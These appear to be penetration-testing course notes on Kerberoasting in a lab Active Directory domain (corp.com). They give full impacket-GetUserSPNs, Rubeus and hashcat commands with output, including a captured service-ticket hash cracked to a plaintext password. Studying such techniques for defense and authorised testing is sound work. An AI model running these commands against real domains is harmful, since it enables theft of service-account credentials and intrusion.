Kerberoasting
Recap
When a user wants to access a resource (by it's service principal name (SPN), the client requests a service ticket that is generated by the Domain Controller.
Kerberoasting
When requesting a service ticket from the Domain Controller, no checks are performed to see if the user has permissions ot access the resource. These checks are formed as a secondary step.
If we know the SPN we want to target, we can request the ticket directly from the Domain Controller.
Kerberoasting is when we request the ticket directly and decrypt with brute force or guessing.
Kerberoasting - Impacket-GetUserSPNs
kali@kali:~$ sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- ----------- -------- -------------------------- --------- ----------
HTTP/web04.corp.com:80 iis_service 2022-09-07 08:38:43.411468 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*iis_service$CORP.COM$corp.com/iis_service*$21b427...39d514241eec...Cracking with Hashcat
kali@kali:~$ sudo hashcat -m 13100 hashes.kerberoast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
$krb5tgs$23$*iis_service$CORP.COM$corp.com/iis_service*$21b427f7d7befca7abfe9fa79ce4de60$ac1459588a99d36fb31cee7aefb03cd740e9cc6d9816806cc1
...
a96a7e6e29aa173b401935f8f3a476cdbcca8f132e6cc8349dcc88fcd26854e334a2856c009bc76e4e24372c4db4d7f41a8be56e1b6a912c44dd2590522934b:Strawberry1
...Kerberoasting from Windows
We can use Rubeus on Windows to perform Kerberoasting.
PS C:\Tools> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.2
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : corp.com
[*] Searching path 'LDAP://DC1.corp.com/DC=corp,DC=com' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : iis_service
[*] DistinguishedName : CN=iis_service,CN=Users,DC=corp,DC=com
[*] ServicePrincipalName : HTTP/web04.corp.com:80
[*] PwdLastSet : 9/7/2022 5:38:43 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\hashes.kerberoastCracking with Hashcat
kali@kali:~$ sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...\
Last updated